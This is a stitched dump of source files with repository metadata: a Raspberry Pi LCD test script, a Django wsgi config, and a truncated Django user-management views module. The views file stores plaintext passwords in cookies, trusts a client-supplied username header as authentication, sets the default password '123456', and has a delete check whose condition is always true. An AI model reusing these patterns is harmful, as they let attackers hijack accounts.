# lcd_16x2.py
# 16x2 LCD Test Script
#
# Author : Matt Hawkins
# Date : 06/04/2015
#
# http://www.raspberrypi-spy.co.uk/
#
# Copyright 2015 Matt Hawkins
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#--------------------------------------
# The wiring for the LCD is as follows:
# 1 : GND
# 2 : 5V
# 3 : Contrast (0-5V)*
# 4 : RS (Register Select)
# 5 : R/W (Read Write) - GROUND THIS PIN
# 6 : Enable or Strobe
# 7 : Data Bit 0 - NOT USED
# 8 : Data Bit 1 - NOT USED
# 9 : Data Bit 2 - NOT USED
# 10: Data Bit 3 - NOT USED
# 11: Data Bit 4
# 12: Data Bit 5
# 13: Data Bit 6
# 14: Data Bit 7
# 15: LCD Backlight +5V**
# 16: LCD Backlight GND
#import
import RPi.GPIO as GPIO
import time
# Define GPIO to LCD mapping
LCD_RS = 26
LCD_E = 19
LCD_D4 = 13
LCD_D5 = 6
LCD_D6 = 5
LCD_D7 = 11
# Define some device constants
LCD_WIDTH = 16 # Maximum characters per line
LCD_CHR = True
LCD_CMD = False
LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
# Timing constants
E_PULSE = 0.0005
E_DELAY = 0.0005
def main():
# Initialise display
lcd_init()
while True:
# Send some test
lcd_string("Rasbperry Pi",LCD_LINE_1)
lcd_string("16x2 LCD Test",LCD_LINE_2)
time.sleep(3) # 3 second delay
# Send some text
lcd_string("1234567890123456",LCD_LINE_1)
lcd_string("abcdefghijklmnop",LCD_LINE_2)
time.sleep(3) # 3 second delay
# Send some text
lcd_string("RaspberryPi-spy",LCD_LINE_1)
lcd_string(".co.uk",LCD_LINE_2)
time.sleep(3)
# Send some text
lcd_string("Follow me on",LCD_LINE_1)
lcd_string("Twitter @RPiSpy",LCD_LINE_2)
time.sleep(3)
def lcd_init():
# Main program block
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
GPIO.setup(LCD_E, GPIO.OUT) # E
GPIO.setup(LCD_RS, GPIO.OUT) # RS
GPIO.setup(LCD_D4, GPIO.OUT) # DB4
GPIO.setup(LCD_D5, GPIO.OUT) # DB5
GPIO.setup(LCD_D6, GPIO.OUT) # DB6
GPIO.setup(LCD_D7, GPIO.OUT) # DB7
# Initialise display
lcd_byte(0x33,LCD_CMD) # 110011 Initialise
lcd_byte(0x32,LCD_CMD) # 110010 Initialise
lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction
lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off
lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size
lcd_byte(0x01,LCD_CMD) # 000001 Clear display
time.sleep(E_DELAY)
def lcd_byte(bits, mode):
# Send byte to data pins
# bits = data
# mode = True for character
# False for command
GPIO.output(LCD_RS, mode) # RS
# High bits
GPIO.output(LCD_D4, False)
GPIO.output(LCD_D5, False)
GPIO.output(LCD_D6, False)
GPIO.output(LCD_D7, False)
if bits&0x10==0x10:
GPIO.output(LCD_D4, True)
if bits&0x20==0x20:
GPIO.output(LCD_D5, True)
if bits&0x40==0x40:
GPIO.output(LCD_D6, True)
if bits&0x80==0x80:
GPIO.output(LCD_D7, True)
# Toggle 'Enable' pin
lcd_toggle_enable()
# Low bits
GPIO.output(LCD_D4, False)
GPIO.output(LCD_D5, False)
GPIO.output(LCD_D6, False)
GPIO.output(LCD_D7, False)
if bits&0x01==0x01:
GPIO.output(LCD_D4, True)
if bits&0x02==0x02:
GPIO.output(LCD_D5, True)
if bits&0x04==0x04:
GPIO.output(LCD_D6, True)
if bits&0x08==0x08:
GPIO.output(LCD_D7, True)
# Toggle 'Enable' pin
lcd_toggle_enable()
def lcd_toggle_enable():
# Toggle enable
time.sleep(E_DELAY)
GPIO.output(LCD_E, True)
time.sleep(E_PULSE)
GPIO.output(LCD_E, False)
time.sleep(E_DELAY)
def lcd_string(message,line):
# Send string to display
message = message.ljust(LCD_WIDTH," ")
lcd_byte(line, LCD_CMD)
for i in range(LCD_WIDTH):
lcd_byte(ord(message[i]),LCD_CHR)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
finally:
lcd_byte(0x01, LCD_CMD)
lcd_string("Goodbye!",LCD_LINE_1)
GPIO.cleanup()
| [
"toblerlstefan@gmail.com"
] | toblerlstefan@gmail.com |
9fb299e45736f5f8f6af63943be50b8b47cbe70a | 1143562f0967cc54dff14ffa6dcc96b5b8c1e0ee | /material_inventory/material_inventory/wsgi.py | ffb656dc363106aea55808cd6c7663486281eca1 | [] | no_license | emmadeyi/material_inventory | 61278a1b60390506636b543a956aeebf0cf08770 | e24ee6e470149596762d022386f9bad55ec5f802 | refs/heads/master | 2022-06-27T18:26:53.787121 | 2020-05-08T11:08:25 | 2020-05-08T11:08:25 | 258,782,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | """
WSGI config for material_inventory project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'material_inventory.settings')
application = get_wsgi_application()
| [
"emma.madeyi.nuetion.com"
] | emma.madeyi.nuetion.com |
d9bb751f34c8e257138dea53f4f9867ddfaf4d38 | 522ef4ac3fcf82c54cec31e494f3ad86fb2fa0cf | /apps/users/views.py | 151cdac264a1a0aa4b565f6d81d01517b973dd07 | [] | no_license | yanshigou/hydrology_mgmt | 845b124ee7fc726db83024458d222ca6edd71acf | 701149c7beebaca169ad7183434dc2004963e6cf | refs/heads/master | 2022-04-09T00:28:15.470710 | 2019-12-30T02:56:55 | 2019-12-30T02:56:55 | 209,734,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 44,325 | py | # -*- coding: utf-8 -*-
from django.views import View
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, JsonResponse
from django.contrib.auth.hashers import make_password
from django.shortcuts import render
from rest_framework.views import APIView
from .forms import RegisterForm, LoginForm, UploadImageForm, UserInfoForm, PasswordForm, CompanySerializer, \
UserProfileSerializer, MessageSerializer, SystemSettingsForm
from .models import UserProfile, HistoryRecord, Message, CompanyModel, SystemSettings
from myutils.mixin_utils import LoginRequiredMixin
from myutils.utils import create_history_record, make_message, jpush_function_extra
from django.core.urlresolvers import reverse
from devices.models import DevicesInfo
from station.models import StationInfo
DEFAULT_PASSWORD = "123456"
class RegisterView2(LoginRequiredMixin, View):
def get(self, request):
register_form = RegisterForm()
username = request.user
if str(username) == "AnonymousUser":
# return HttpResponseRedirect(reverse("login"))
return render(request, 'register2.html', {'msg': '请先登录确认权限后再注册其他账号'})
user = UserProfile.objects.get(username=username)
# print(user.permission)
if user.permission == 'superadmin':
company_id = CompanyModel.objects.all()
return render(request, 'register2.html', {
'register_form': register_form,
'permission': user.permission,
"company_id": company_id
})
elif user.permission == 'admin':
company_id = user.company.id
return render(request, 'register2.html', {
'register_form': register_form,
'permission': user.permission,
"company_id": company_id
})
else:
company_id = user.company.id
return render(request, 'register2.html', {
'permission': user.permission,
'msg': '您没有权限注册其他账号,请联系管理员',
"company_id": company_id
})
def post(self, request):
username = request.user.username
user = UserProfile.objects.get(username=username)
# print(user.permission)
if (user.permission != "superadmin") and (user.permission != "admin"):
return JsonResponse({
'status': "fail",
'msg': '您没有权限注册其他账号'
})
password = request.POST.get('password', '')
if password == "":
password = '123456'
# print(password)
permission = request.POST.get('permission', 'user')
company_id = request.POST.get('company', '')
username = request.POST.get('username', '')
if not username or UserProfile.objects.filter(username=username):
return JsonResponse({
'status': "fail",
'msg': '请检查用户名是否填写或重复'
})
if permission == "superadmin":
return JsonResponse({
'status': "fail",
'msg': '您没有权限注册超级管理员'
})
if permission == "admin" and user.permission != "superadmin":
return JsonResponse({
'status': "fail",
'msg': '您没有权限注册管理员'
})
user_profile = UserProfile()
user_profile.username = username
user_profile.password = make_password(password)
user_profile.permission = permission
user_profile.company_id = company_id
user_profile.save()
# 记录操作
if permission == "superadmin":
permission = "超级管理员"
elif permission == "admin":
permission = "管理员"
elif permission == "user":
permission = "用户"
elif permission == "other":
permission = "其他类型用户"
make_message(username, "初始密码过于简单,请立即修改密码!", -1)
create_history_record(user, "注册 %s 账号 %s" % (permission, username))
return JsonResponse({
'status': "success",
'msg': '注册成功'
})
class LoginView(View):
def get(self, request):
# print(request.COOKIES)
if 'username' in request.COOKIES:
# 获取记住的用户名
username = request.COOKIES['username']
else:
username = ''
if 'password' in request.COOKIES:
# 获取记住的用户名
password = request.COOKIES['password']
else:
password = ''
return render(request, "login.html", {'username': username, "password": password})
def post(self, request):
login_form = LoginForm(request.POST)
if login_form.is_valid():
user_name = request.POST.get('username', '')
pass_word = request.POST.get('password', '')
remember = request.POST.get('remember', '')
# print(remember)
user = authenticate(username=user_name, password=pass_word)
if user is not None:
if user.is_active:
response = HttpResponseRedirect(reverse("index"))
login(request, user)
create_history_record(user, "登录")
if remember == "on":
# 设置cookie username *过期时间为1周
response.set_cookie('username', user_name, max_age=7 * 24 * 3600)
response.set_cookie('password', pass_word, max_age=7 * 24 * 3600)
response.set_cookie('password', pass_word, max_age=7 * 24 * 3600)
return response
# return HttpResponse('登录成功')
else:
return render(request, 'login.html', {'msg': "用户未激活"})
else:
return render(request, 'login.html', {'msg': '用户名或密码错误!'})
else:
return render(request, 'login.html', {'login_form': login_form})
class AppLoginView(View):
def post(self, request):
try:
user_name = request.POST.get('username', '')
pass_word = request.POST.get('password', '')
user = authenticate(username=user_name, password=pass_word)
# print(user_name)
# print(pass_word)
if user is not None:
if user.is_active:
login(request, user)
create_history_record(user, "app登录")
return JsonResponse({
"error_no": 0
})
else:
return JsonResponse({
"error_no": 3,
"info": "not active"
})
else:
return JsonResponse({
"error_no": 2,
"info": "username or password wrong"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
# 修改密码
class ChangePassword(View):
def get(self, request):
return render(request, 'change_password.html', {})
def post(self, request):
password_form = PasswordForm(request.POST)
# print(request.POST)
if password_form.is_valid():
old_password = request.POST.get('old_password', '')
password1 = request.POST.get('password1', '')
password2 = request.POST.get('password2', '')
user = authenticate(username=request.user.username, password=old_password)
# print(user)
if not user:
return render(request, 'change_password.html', {'msg': '请先登录后,再修改密码'})
if user is not None:
if password1 == password2:
userinfo = UserProfile.objects.get(username=user)
userinfo.password = make_password(password1)
userinfo.save()
create_history_record(user, "修改密码")
return render(request, 'change_password.html', {'msg': '密码修改成功!'})
else:
return render(request, 'change_password.html', {'msg': '两次密码不一致'})
else:
return render(request, 'change_password.html', {'msg': '原密码错误'})
else:
return render(request, 'change_password.html', {'password_form': password_form})
# class AppChangePassword(View):
#
# def post(self, request):
# try:
# username = request.POST.get('username', '')
# old_password = request.POST.get('old_password', '')
# password1 = request.POST.get('password1', '')
# password2 = request.POST.get('password2', '')
# # print(username)
# # print(old_password)
# user = authenticate(username=username, password=old_password)
# print(user)
# if not user:
# return JsonResponse({
# "error_no": 1,
# "info": "login first"
# })
# if user is not None:
# if password1 == password2:
# userinfo = UserProfile.objects.get(username=user)
# userinfo.password = make_password(password1)
# userinfo.save()
# create_history_record(user, "app修改密码")
# return JsonResponse({
# "error_no": 0
# })
# else:
# return JsonResponse({
# "error_no": 1,
# "info": "password not same"
# })
# else:
# return JsonResponse({
# "error_no": 1,
# "info": "password wrong"
# })
# except Exception as e:
# print(e)
# return JsonResponse({
# "error_no": -1,
# "info": str(e)
# })
class ResetPasswordView(View):
def post(self, request):
permission = request.user.permission
if permission not in ['superadmin', 'admin']:
return JsonResponse({
"status": "fail",
"msg": "您没有权限重置密码"
})
user_id = request.POST.get('user_id')
userinfo = UserProfile.objects.get(id=user_id)
if userinfo.permission == 'admin' and permission == 'admin':
return JsonResponse({
"status": "success",
"msg": "您没有权限重置管理员的密码"
})
userinfo.password = make_password("123456")
userinfo.save()
make_message(userinfo.username, "已重置密码,请立即修改密码!", -1)
res = jpush_function_extra(userinfo.username, "2", "已重置密码,请立即修改密码!", "已重置密码,密码过于简单,建议立即修改密码!")
print(res.json())
return JsonResponse({
"status": "success",
"msg": "重置密码成功"
})
class LogoutView(View):
def get(self, request):
create_history_record(request.user, "退出登录")
logout(request)
return HttpResponseRedirect(reverse("login"))
# return HttpResponse('退出成功')
class LogoutApiView(View):
def get(self, request):
# create_history_record(request.user, "退出登录")
logout(request)
# return HttpResponseRedirect(reverse("login"))
# return HttpResponse('退出成功')
return JsonResponse({
"error_no": 0
})
class Index(LoginRequiredMixin, View):
def get(self, request):
return render(request, 'blank.html', {})
class UserInfoView(LoginRequiredMixin, View):
def get(self, request):
return render(request, 'userinfo.html')
# 修改用户信息
def post(self, request):
userinfo_form = UserInfoForm(request.POST, instance=request.user)
if userinfo_form.is_valid():
userinfo_form.save()
create_history_record(request.user, "修改用户个人信息")
return JsonResponse({"status": "success"})
else:
return JsonResponse({
"status": "fail",
"errors": userinfo_form.errors,
})
class UploadImageView(LoginRequiredMixin, View):
def get(self, request):
return render(request, 'upload_image.html')
def post(self, request):
image_form = UploadImageForm(request.POST, request.FILES, instance=request.user)
if image_form.is_valid():
image_form.save()
create_history_record(request.user, "修改头像")
return HttpResponseRedirect(reverse("user_info"))
else:
return HttpResponseRedirect(reverse("upload_image"))
class AllUsersView(LoginRequiredMixin, View):
def get(self, request):
permission = request.user.permission
if permission == 'superadmin':
all_users = UserProfile.objects.all()
else:
compan_id = request.user.company.id
print(compan_id)
all_users = UserProfile.objects.filter(company_id=compan_id)
create_history_record(request.user, '查询所有用户信息')
return render(request, 'all_users.html', {
"all_users": all_users
})
class DelUserView(LoginRequiredMixin, View):
# 删除用户!
def post(self, request):
permission = request.user.permission
# print(permission)
if permission != 'superadmin':
return JsonResponse({"status": "fail", "quanxianbuzu": "对不起,您的权限不足!"})
user_id = request.POST.get("user_id")
# print(user_id)
user = UserProfile.objects.get(id=user_id)
username = user.username
user.delete()
create_history_record(request.user, '删除账号 %s' % username)
return JsonResponse({"status": "success"})
class ChangePermissionView(LoginRequiredMixin, View):
def get(self, request, user_id):
permission = request.user.permission
if permission not in ['superadmin', 'admin']:
return HttpResponseRedirect(reverse("user_info"))
user = UserProfile.objects.get(id=user_id)
return render(request, 'change_permission.html', {
"user": user
})
def post(self, request, user_id):
permission = request.user.permission
if permission not in ['superadmin', 'admin']:
return HttpResponseRedirect(reverse("user_info"))
user = UserProfile.objects.get(id=user_id)
# print(request.POST.get('permission'))
user.permission = request.POST.get('permission')
user.save()
username = user.username
create_history_record(request.user, '修改账号 %s 权限为 %s' % (username, request.POST.get('permission')))
return JsonResponse({"status": "success"})
class HistoryRecordView(LoginRequiredMixin, View):
def get(self, request):
username = request.user.username
permission = request.user.permission
if permission == "superadmin":
all_users = UserProfile.objects.all()[:1500]
return render(request, 'all_history.html', {
"all_users": all_users
})
history_record = HistoryRecord.objects.filter(username_id=username, r_type=True).order_by('-time')[:1500]
create_history_record(request.user, '查询历史操作记录')
return render(request, 'history_record.html', {
"history_record": history_record
})
class AllHistoryRecordView(LoginRequiredMixin, View):
def get(self, request, user_name):
permission = request.user.permission
if permission == "superadmin":
history_record = HistoryRecord.objects.filter(username_id=user_name, r_type=True).order_by('-time')[:1500]
create_history_record(request.user, '查询 %s 的历史操作记录' % user_name)
return render(request, 'history_record.html', {
"history_record": history_record
})
return HttpResponseRedirect(reverse("user_info"))
class MessageView(View):
def get(self, request):
all_message = Message.objects.filter(username_id=request.user.username)
return render(request, 'message.html', {
"all_message": all_message
})
def post(self, request):
msg_id = request.POST.get('msg_id', '')
# print(msg_id)
message = Message.objects.get(username_id=request.user.username, id=msg_id)
message.has_read = True
message.save()
return JsonResponse({"status": "success"})
def page_not_found(request):
# 404
response = render(request, '404.html', {})
response.status_code = 404
return response
def page_error(request):
# 500
response = render(request, '500.html', {})
response.status_code = 500
return response
class CompanyAddView(LoginRequiredMixin, View):
"""
新建公司
"""
def get(self, request):
permission = request.user.permission
print(permission)
if permission == 'superadmin':
return render(request, 'company_form_add.html')
else:
return HttpResponseRedirect(reverse("index"))
def post(self, request):
try:
permission = request.user.permission
print(permission)
if permission != "superadmin":
return JsonResponse({"status": "fail", "errors": "无权限"})
serializer = CompanySerializer(data=request.POST)
phone = request.POST["phone"]
if UserProfile.objects.filter(username=phone).count() > 0:
return JsonResponse({"status": "fail", "errors": "该电话号码的用户已经存在"})
if serializer.is_valid():
newcompany = serializer.save()
UserProfile.objects.create_user(username=phone, password=DEFAULT_PASSWORD, company=newcompany,
permission="admin")
create_history_record(request.user, "新建公司%s,管理员%s" % (newcompany.company_name, phone))
return JsonResponse({"status": "success"})
return JsonResponse({"status": "fail", "errors": "新建公司失败"})
except Exception as e:
print(e)
return JsonResponse({
"status": "fail",
"errors": "公司名称唯一"
})
class CompanyView(LoginRequiredMixin, View):
def get(self, request):
permission = request.user.permission
print(permission)
if permission == 'superadmin':
all_company = CompanyModel.objects.all().order_by('id')
all_admin_user = UserProfile.objects.filter(permission='admin')
return render(request, 'company_info.html', {"all_company": all_company, "all_admin_user": all_admin_user})
else:
return HttpResponseRedirect(reverse("index"))
class DelCompanView(LoginRequiredMixin, View):
def post(self, request):
permission = request.user.permission
print(permission)
if permission == 'superadmin':
try:
company_id = request.POST.get('company_id', "")
dev_infos = DevicesInfo.objects.filter(company_id=company_id)
company = CompanyModel.objects.filter(id=company_id)
# print(infos)
if dev_infos:
return JsonResponse({"status": "fail", "msg": "该公司下有设备,禁止删除。"})
company_name = company[0].company_name
company.delete()
create_history_record(request.user, '删除公司 %s' % company_name)
return JsonResponse({"status": "success"})
except Exception as e:
print(e)
return JsonResponse({"status": "fail", "msg": str(e)})
else:
return HttpResponseRedirect(reverse("index"))
# 1104重写app html api json
class LoginApiView(APIView):
"""
登录
"""
def post(self, request):
try:
username = request.data.get('username')
password = request.data.get('password')
user = authenticate(username=username, password=password)
if user is not None:
# is_active是否启用
if user.is_active:
login(request, user)
create_history_record(user, "app登录")
permission = user.permission
company_id = user.company
company_name = user.company
if company_id:
company_id = company_id.id
else:
company_id = ""
if company_name:
company_name = company_name.company_name
else:
company_name = ""
return JsonResponse({
"permission": permission, "company_id": company_id, "error_no": 0,
"company_name": company_name
})
else:
return JsonResponse({
"error_no": 3,
"info": "not active"
})
else:
return JsonResponse({
"error_no": -3,
"info": "username or password wrong"
})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class ResetPasswordApiView(APIView):
"""
共用重置密码
"""
def post(self, request):
try:
username = request.META.get("HTTP_USERNAME")
user_id = request.data.get('user_id')
user = UserProfile.objects.get(username=username)
permission = user.permission
if permission not in ['superadmin', 'admin']:
return JsonResponse({
"error_no": 2,
"info": "您没有权限重置密码"
})
if permission == 'superadmin':
userinfo = UserProfile.objects.get(id=user_id)
userinfo.password = make_password("123456")
userinfo.save()
create_history_record(username, '重置%s的密码' % userinfo.username)
make_message(userinfo.username, "已重置密码,请立即修改密码!", -1)
elif permission == 'admin':
company_id = user.company_id
userinfo = UserProfile.objects.get(id=user_id, company_id=company_id)
if userinfo.permission == 'admin' or userinfo.permission == 'superadmin':
return JsonResponse({
"error_no": -2,
"info": "您没有权限重置密码"
})
return JsonResponse({
"error_no": 0,
"info": "重置密码成功"
})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class ChangePasswordApiView(APIView):
"""
共用修改密码api
"""
def post(self, request):
try:
username = request.data.get('username', '')
old_password = request.data.get('old_password', '')
password1 = request.data.get('password1', '')
password2 = request.data.get('password2', '')
user = authenticate(username=username, password=old_password)
if user is not None:
if password1 == password2:
userinfo = UserProfile.objects.get(username=user)
userinfo.password = make_password(password1)
userinfo.save()
create_history_record(user, "修改密码")
return JsonResponse({
"error_no": 0,
"info": "Success"
})
else:
return JsonResponse({
"error_no": 1,
"info": "两次密码不一致"
})
else:
return JsonResponse({
"error_no": 1,
"info": "用户名或密码错误"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class UserInfoApiView(APIView):
"""
共用用户信息 增删改查
超级管理员操作所有用户
管理员仅能操作当前公司下的用户
"""
def get(self, request):
try:
username = request.META.get("HTTP_USERNAME")
print(username)
users = UserProfile.objects.get(username=username)
permission = users.permission
if permission == 'superadmin':
all_users = UserProfile.objects.all().order_by('company_id')
serializer = UserProfileSerializer(all_users, many=True)
elif permission == 'admin':
company_id = users.company_id
all_users = UserProfile.objects.filter(company_id=company_id).order_by('id')
serializer = UserProfileSerializer(all_users, many=True)
else:
return JsonResponse({"error_no": 2, "info": "你没有权限修改"})
data = {
"data": serializer.data,
"error_no": 0
}
create_history_record(username, "查询用户列表")
return JsonResponse(data)
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def post(self, request):
try:
username = request.META.get("HTTP_USERNAME")
newusername = request.data.get("newuser")
phone = request.data.get("phone")
password = request.data.get("password")
if not password:
password = '123456'
company_name = request.data.get("company_name")
perm = request.data.get("permission")
user = UserProfile.objects.get(username=username)
permission = user.permission
if permission == 'superadmin':
company_id = CompanyModel.objects.get(company_name=company_name).id
UserProfile.objects.create_user(username=newusername, password=password, mobile=phone,
company_id=company_id, permission=perm)
elif permission == 'admin':
company_id = user.company_id
UserProfile.objects.create_user(username=newusername, password=password, mobile=phone,
company_id=company_id, permission=perm)
else:
return JsonResponse({"error_no": -2, "info": "没有权限新增用户"})
create_history_record(username,
"新增用户%s-%s" % (CompanyModel.objects.get(id=company_id).company_name, newusername))
return JsonResponse({"error_no": 0, "info": "Success"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except CompanyModel.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个公司"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def put(self, request):
"""
仅修改权限
"""
try:
username = request.META.get("HTTP_USERNAME")
perm = request.data.get("permission")
modify_username = request.data.get("username")
user = UserProfile.objects.get(username=username)
permission = user.permission
if perm == 'superadmin':
return JsonResponse({"error_no": -2, "info": "你没有权限修改"})
if permission == 'superadmin':
modify_user = UserProfile.objects.get(username=modify_username)
modify_user.permission = perm
modify_user.save()
create_history_record(username,
"修改用户%s权限为%s" % (modify_user.username, modify_user.get_permission_display()))
return JsonResponse({"error_no": 0, "info": "Success"})
elif permission == 'admin':
company_id = user.company.id
modify_user = UserProfile.objects.get(username=modify_username, company_id=company_id)
modify_user.permission = perm
modify_user.save()
create_history_record(username,
"修改用户%s权限为%s" % (modify_user.username, modify_user.get_permission_display()))
return JsonResponse({"error_no": 0, "info": "Success"})
else:
return JsonResponse({"error_no": -2, "info": "你没有权限修改"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def delete(self, request):
try:
username = request.META.get("HTTP_USERNAME")
delete_username = request.data.get("username")
admin_user = UserProfile.objects.get(username=username)
del_user = UserProfile.objects.get(username=delete_username)
admin_permission = admin_user.permission
del_user_permission = del_user.permission
if admin_permission == "superadmin" and (
del_user_permission != 'admin' or del_user_permission != 'superadmin'):
del_user.delete()
create_history_record(username, "删除用户" + delete_username)
return JsonResponse({"error_no": 0, "info": "Success"})
elif admin_permission == 'admin':
company_id = admin_user.company.id
del_user = UserProfile.objects.get(username=delete_username, company_id=company_id)
if del_user and del_user.permission != 'admin':
del_user.delete()
create_history_record(username, "删除用户" + delete_username)
return JsonResponse({"error_no": 0, "info": "Success"})
else:
return JsonResponse({"error_no": -3, "info": "该公司下没有此用户,或权限不足"})
else:
return JsonResponse({"error_no": -3, "info": "权限不足"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class CompanyApiView(APIView):
"""
共用公司管理等
仅超级管理员
"""
def get(self, request):
try:
username = request.META.get("HTTP_USERNAME")
user = UserProfile.objects.get(username=username)
permission = user.permission
data = list()
if permission == 'superadmin':
all_company = CompanyModel.objects.all().order_by('id')
for company in all_company:
admin_user = UserProfile.objects.filter(company=company)
admin = [u.username for u in admin_user]
data.append({
"id": company.id,
"company_name": company.company_name,
"contact": company.contact,
"phone": company.phone,
"status": company.company_status,
"admin": admin
})
create_history_record(username, "查询所有公司")
return JsonResponse({
"data": data,
"error_no": 0
})
else:
return JsonResponse({"error_no": -2, "info": "你没有权限"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def post(self, request):
try:
username = request.META.get("HTTP_USERNAME")
user = UserProfile.objects.get(username=username)
permission = user.permission
if permission != "superadmin":
return JsonResponse({"error_no": -2, "info": "无权限"})
serializer = CompanySerializer(data=request.data)
phone = request.data["phone"]
if UserProfile.objects.filter(username=phone).count() > 0:
return JsonResponse({"error_no": -3, "info": "该电话号码的用户已经存在"})
if serializer.is_valid():
newcompany = serializer.save()
UserProfile.objects.create_user(username=phone, password=DEFAULT_PASSWORD, company=newcompany,
permission="admin")
create_history_record(username, "新建公司%s,管理员%s" % (newcompany.company_name, phone))
return JsonResponse({"error_no": 0, "info": "Success"})
return JsonResponse({"error_no": -2, "info": "新建公司失败"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def put(self, request):
try:
username = request.META.get("HTTP_USERNAME")
user = UserProfile.objects.get(username=username)
permission = user.permission
if permission != "superadmin":
return JsonResponse({"error_no": -2, "info": "无权限"})
company_id = request.data.get("company_id")
company_name = request.data.get("company_name")
company_status = request.data.get("company_status")
contact = request.data.get("contact")
phone = request.data.get("phone")
company = CompanyModel.objects.get(id=company_id)
company.company_name = company_name
company.contact = contact
company.phone = phone
company.company_status = company_status
company.save()
create_history_record(username, "修改公司" + company.company_name)
return JsonResponse({"error_no": 0, "info": "Success"})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except CompanyModel.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个公司"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def delete(self, request):
try:
print('companyApi del')
username = request.META.get("HTTP_USERNAME")
user = UserProfile.objects.get(username=username)
permission = user.permission
if permission != "superadmin":
return JsonResponse({"error_no": -2, "info": "无权限"})
company_id = request.data['company_id']
company = CompanyModel.objects.get(id=company_id)
company.delete()
user = UserProfile.objects.filter(company=company_id)
user.delete()
create_history_record(username, "删除公司%s,用户%s" % (company.company_name, [u.username for u in user]))
return JsonResponse({"error_no": 0, "info": "Success"})
except CompanyModel.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个公司"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class MessageApiView(APIView):
def get(self, request):
try:
username = request.META.get("HTTP_USERNAME")
all_message = Message.objects.filter(username__username=username)
message_ser = MessageSerializer(all_message, many=True)
return JsonResponse({
"error_no": 0,
"info": "Success",
"data": message_ser.data
})
except UserProfile.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个用户"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
def post(self, request):
try:
username = request.META.get("HTTP_USERNAME")
msg_id = request.data.get('msg_id')
all_read = request.data.get('all_read')
if all_read == "1" and not msg_id:
Message.objects.filter(username__username=username).update(has_read=True)
else:
message = Message.objects.get(username__username=username, id=msg_id)
message.has_read = True
message.save()
return JsonResponse({
"error_no": 0
})
except Message.DoesNotExist:
return JsonResponse({
"error_no": -2,
"info": "没有这个消息"
})
except Exception as e:
print(e)
return JsonResponse({
"error_no": -1,
"info": str(e)
})
class SystemStationView(LoginRequiredMixin, View):
def get(self, request):
permission = request.user.permission
print(permission)
if permission == 'superadmin':
all_station = StationInfo.objects.all()
else:
try:
company = request.user.company.company_name
# print(company)
except Exception as e:
print(e)
return HttpResponseRedirect(reverse('index'))
if company:
all_station = StationInfo.objects.filter(company__company_name=company)
else:
all_station = ""
create_history_record(request.user, '系统设置查询所有测站点')
return render(request, 'sys_station.html', {
"all_station": all_station,
})
# TODO 目前为全局设置,以后会绑定到站点上
class SystemSettingsView(LoginRequiredMixin, View):
def get(self, request, station_id):
permission = request.user.permission
print(permission)
if permission == 'superadmin':
try:
sys_settings = SystemSettings.objects.get(station_id=station_id)
except SystemSettings.DoesNotExist:
sys_settings = SystemSettings.objects.create(station_id=station_id, water_min_level=0,
water_max_level=0, flow_min_level=0, flow_max_level=0,
deviate_value=0, volt_value=0, is_alarm=0)
return render(request, 'sys_settings.html', {"sys_settings": sys_settings})
return render(request, 'sys_settings.html', {"sys_settings": sys_settings})
else:
try:
